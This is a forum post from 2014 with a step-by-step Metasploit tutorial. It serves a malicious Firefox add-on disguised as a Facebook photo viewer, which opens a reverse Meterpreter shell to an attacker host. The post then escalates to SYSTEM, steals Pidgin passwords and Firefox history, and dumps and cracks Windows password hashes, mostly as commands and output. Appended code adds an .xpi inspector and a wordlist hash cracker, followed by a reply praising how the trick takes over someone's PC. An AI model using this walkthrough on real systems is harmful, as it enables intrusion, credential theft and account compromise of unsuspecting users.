crossbower Posted February 4, 2014

Mozilla Firefox Bootstrapped Addon

Platform: victim = Windows 7 / attacker = Kali Linux
Rank: Excellent
Privileged: No / but with payload windows/meterpreter/reverse_tcp YES
Mission:
- getsystem access with SYSTEM privilege rights
- get Pidgin creds
- get hashdump and crack the hashes
- get Firefox history (stolen creds)

Description:
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

References:
https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions
TippingPoint | DVLabs | XPI: The next malware vector?

First step: we start the services and run msfconsole:

root@kali:~# service postgresql start && service metasploit start && msfconsole

We search for firefox_xpi and find the bootstrapped addon exploit:

msf > search firefox_xpi

Matching Modules
================
exploit/multi/browser/firefox_xpi_bootstrapped_addon  2007-06-27 00:00:00 UTC  excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution

We will be configuring the exploit:

Basic options:
Name       Current Setting / Description
----       -----------------------------
ADDONNAME  HTML5 Rendering Enhancements
SRVHOST    The local host to listen on.
SRVPORT    The local port to listen on.
URIPATH    The URI to use for this exploit

In the video tutorial it is configured for a facebook photo viewer:

ADDONNAME  facebook hidden foto viewer
SRVHOST    192.168.1.19
SRVPORT    80
URIPATH    /facebook-photo-viewer.xpi

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME facebook hidden foto viewer
ADDONNAME => facebook hidden foto viewer
msf exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.19
SRVHOST => 192.168.1.19
msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /facebook-photo-viewer.xpi
URIPATH => /facebook-photo-viewer.xpi
msf exploit(firefox_xpi_bootstrapped_addon) >

Set up a listener payload (without the official payloads):

PAYLOAD  windows/meterpreter/reverse_tcp
LHOST    192.168.1.19
LPORT    443

msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 443

Set up the target from the available targets:

0  Universal (Javascript XPCOM Shell)
1  Windows x86 (Native Payload)
2  Windows x64 (Native Payload)
3  Linux x86 (Native Payload)
4  Linux x64 (Native Payload)
5  Mac OS X PPC (Native Payload)

msf exploit(firefox_xpi_bootstrapped_addon) > set TARGET 1
TARGET => 1
msf exploit(firefox_xpi_bootstrapped_addon) > exploit -j

We run the exploit, and the exploit creates a .xpi addon that will be presented to the victim via a web page. Once the victim clicks "install", the addon is installed and executes the payload with full user permissions.

msf exploit(firefox_xpi_bootstrapped_addon) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.19:443
msf exploit(firefox_xpi_bootstrapped_addon) >
[*] Using URL: http://192.168.1.19:80/facebook-photo-viewer.xpi
[*] Server started.
[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] Sending stage (769024 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.19:443 -> 192.168.1.202:49207)

Now the game has started: hunting for Pidgin creds, hashdump and Firefox creds.

Interact with meterpreter session 1, then getsystem to obtain SYSTEM privileges. We search for a service running with SYSTEM privileges on the remote system and migrate into that process. I used PID 2980:

2980  468  svchost.exe  x86  0  NT AUTHORITY\SYSTEM

meterpreter > getsystem
...got system (via technique 1).
meterpreter > migrate 2980
[*] Migrating from 1560 to 2980...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now the system is ready for extracting the creds: Firefox, Pidgin and hashdump.

Now put the opened session in the background and extract the Firefox creds, using the post exploitation module windows/gather/forensics/browser_history:

meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac) > use windows/gather/forensics/browser_history
msf post(browser_history) > set SESSION 1
SESSION => 1
msf post(browser_history) > exploit -j

This module searches for creds in Firefox, Chrome and Skype:

[*] Gathering user profiles
[*] Checking for Chrome History artifacts...
[-] Chrome History directory not found for redmon
[*] Checking for Chrome Archived History artifacts...
[-] Chrome Archived History directory not found for redmon
[*] Checking for Skype artifacts...
[-] Skype directory not found for redmon
[*] Checking for Firefox artifacts...
[+] Firefox directory found redmon
[*] Downloading C:\Users\redmon\AppData\Roaming\Mozilla\Firefox\Profiles\3dtmxh0g.default\places.sqlite
[+] Firefox artifact file saved to /root/.msf4/local/redmon_Firefox_3dtmxh0g.default_places.sqlite
[*] Post module execution completed

DONE

Now we use a post exploitation module for the Pidgin creds:

msf post(browser_history) > use post/multi/gather/pidgin_cred
msf post(pidgin_cred) > set CONTACTS 1
CONTACTS => 1
msf post(pidgin_cred) > set SESSION 1
SESSION => 1
msf post(pidgin_cred) >
[*] Checking for Pidgin profile in: C:\Users\redmon\AppData\Roaming
[*] Found C:\Users\redmon\AppData\Roaming\.purple
[*] Reading accounts.xml file from C:\Users\redmon\AppData\Roaming\.purple
[*] Collected the following credentials:
[*] Server: <unknown>:5222
[*] Protocol: prpl-jabber
[*] Username: msftester@exploit.im
[*] Password: unixunix
[*] Collected the following contacts:
[*] Buddy Name: wuala@jabber.ru
[*] Alias: wuala
[*] Protocol: prpl-jabber
[*] Account: msftester@exploit.im
[*] Post module execution completed

DONE

Now we extract the hashdump and crack it. We need to return to the opened session:

msf post(pidgin_cred) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter >

NOW cracking the hashes:

root@kali:~# echo "Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::" >> pass.txt
root@kali:~# john --format=nt pass.txt
Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
123456           (redmon)
iloveyou         (Administrator)

DONE

Have fun and thanks for watching and reading my tuts.
http://www.youtube.com/watch?v=0DNBvPTBmow
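The post relies on one property of the legacy add-on format: an install.rdf with em:bootstrap set to true makes Firefox run bootstrap.js with full chrome privileges, and from there XPCOM can launch an arbitrary process as the logged-on user. The following is an added example, not code from the post or from the Metasploit module, that inspects a .xpi (a plain zip archive) for exactly those traits before it is allowed onto a machine. The add-on ID, the sample install.rdf, the bootstrap.js fragment and the indicator regexes are this example's own constructions and assumptions; they are illustrative, not a complete signature set. (Add-ons of this install.rdf/bootstrap.js kind stopped loading in Firefox 57, so the check targets the format the 2014 post describes.)

```python
"""Static check of a Firefox .xpi for a bootstrapped add-on that launches processes.

Added example, not part of the forum post. Indicator patterns are assumptions
about what an analyst would flag, not an exhaustive signature list.
"""
import io
import re
import zipfile

# Assumed indicators for bootstrap.js: XPCOM process launch, file drop, self-removal.
SUSPICIOUS_PATTERNS = {
    "process_launch": re.compile(r"@mozilla\.org/process/util;1|nsIProcess"),
    "file_write": re.compile(r"nsIFileOutputStream|@mozilla\.org/file/local;1"),
    "self_uninstall": re.compile(r"AddonManager\.getAddonByID|\.uninstall\(\)"),
}
BOOTSTRAP_RE = re.compile(r"<em:bootstrap>\s*true\s*</em:bootstrap>", re.I)
ID_RE = re.compile(r"<em:id>([^<]+)</em:id>")


def inspect_xpi(xpi_bytes: bytes) -> dict:
    """Return findings for one .xpi image held in memory."""
    findings = {"bootstrapped": False, "addon_id": None, "indicators": [], "files": []}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        names = zf.namelist()
        findings["files"] = sorted(names)
        if "install.rdf" in names:
            rdf = zf.read("install.rdf").decode("utf-8", "replace")
            findings["bootstrapped"] = bool(BOOTSTRAP_RE.search(rdf))
            m = ID_RE.search(rdf)
            if m:
                findings["addon_id"] = m.group(1).strip()
        if "bootstrap.js" in names:
            js = zf.read("bootstrap.js").decode("utf-8", "replace")
            findings["indicators"] = [k for k, p in SUSPICIOUS_PATTERNS.items() if p.search(js)]
    # A bootstrapped add-on that can spawn a process is what the post's module delivers.
    findings["verdict"] = (
        "block" if findings["bootstrapped"] and "process_launch" in findings["indicators"] else "review"
    )
    return findings


def build_sample_xpi(bootstrapped: bool, launches_process: bool) -> bytes:
    """Constructed sample .xpi (not a real add-on) so the check runs offline."""
    install_rdf = f"""<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>example@example.test</em:id>
    <em:name>sample addon</em:name>
    <em:version>1.0</em:version>
    <em:bootstrap>{"true" if bootstrapped else "false"}</em:bootstrap>
  </Description>
</RDF>
"""
    # Structural fragment only: the four bootstrap entry points, with startup()
    # obtaining an nsIProcess instance when launches_process is set.
    body = (
        '  var proc = Components.classes["@mozilla.org/process/util;1"]\n'
        "               .createInstance(Components.interfaces.nsIProcess);\n"
        if launches_process
        else "  // benign: no process launch here\n"
    )
    bootstrap_js = (
        "function startup(data, reason) {\n" + body + "}\n"
        "function shutdown(data, reason) {}\n"
        "function install(data, reason) {}\n"
        "function uninstall(data, reason) {}\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("install.rdf", install_rdf)
        zf.writestr("bootstrap.js", bootstrap_js)
    return buf.getvalue()


if __name__ == "__main__":
    for flags in ((True, True), (False, False)):
        print(flags, inspect_xpi(build_sample_xpi(*flags)))
```

The regexes look at source text only, so an add-on that builds the contract ID at runtime from string pieces will slip past them; the durable control is the one the post itself hints at: the install prompt. Users who click "install" on an unsigned add-on from an arbitrary URL hand over their full user context, so blocking third-party XPI installs by policy and reviewing extension directories on hosts is the check that matters.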
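The hashdump and john step above works because an NT hash is just MD4 over the UTF-16LE encoding of the password, with no salt, which is why four accounts with different passwords can be attacked in one pass and why a tiny wordlist recovers "123456". The following is an added example, not from the post, that recomputes NT hashes for the four pwdump lines the post shows and adds the two checks worth doing before cracking: the LM field aad3b435b51404eeaad3b435b51404ee is the empty LM hash (LM storage disabled, so the old LM attack path is closed), and an NT field equal to MD4("") means a blank password. MD4 is implemented inline because hashlib's md4 is missing on many current OpenSSL builds; the wordlist is constructed for the example.

```python
"""NT hash recomputation and sanity checks over pwdump-style hashdump lines.

Added example, not part of the forum post. The wordlist is constructed.
"""
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/disabled LM password


def _rol(x: int, s: int) -> int:
    return ((x << s) | (x >> (32 - s))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, 16-byte digest."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for func, order, shifts, k in rounds:
            for i in range(16):
                t = (-i) % 4  # target word cycles a, d, c, b
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rol((v[t] + func(x, y, z) + X[order[i]] + k) & _MASK, shifts[i % 4])
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted, as hex."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse 'user:rid:lmhash:nthash:::' lines and annotate the two cheap checks."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        rows.append({
            "user": user, "rid": rid, "lm": lm, "nt": nt,
            "lm_disabled": lm == EMPTY_LM,        # no LM hash stored for this account
            "blank_password": nt == nt_hash(""),  # NT hash of the empty string
        })
    return rows


def crack(rows: list, wordlist: list) -> dict:
    """Unsalted hashes: hash each candidate once, then look every account up."""
    table = {nt_hash(w): w for w in wordlist}
    return {r["user"]: table[r["nt"]] for r in rows if r["nt"] in table}


# The four lines the post's hashdump printed.
HASHDUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""
WORDLIST = ["", "123456", "iloveyou", "password"]  # constructed for the example

if __name__ == "__main__":
    rows = parse_pwdump(HASHDUMP)
    for r in rows:
        print(r["user"], "lm_disabled=%s blank=%s" % (r["lm_disabled"], r["blank_password"]))
    print(crack(rows, WORDLIST))
```

Because the hashes are unsalted, the candidate list is hashed once and reused for every account, which is the same reason john reports "no different salts" and finishes instantly here; the real cost of cracking is the size of the wordlist, not the number of accounts. The Guest line is a case where no cracking is needed at all: its NT field is MD4 of the empty string.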
Guest Kovalski Posted February 4, 2014

Very good tutorial, +rep.
In two words: how to get full access to someone's PC through nothing but an addon.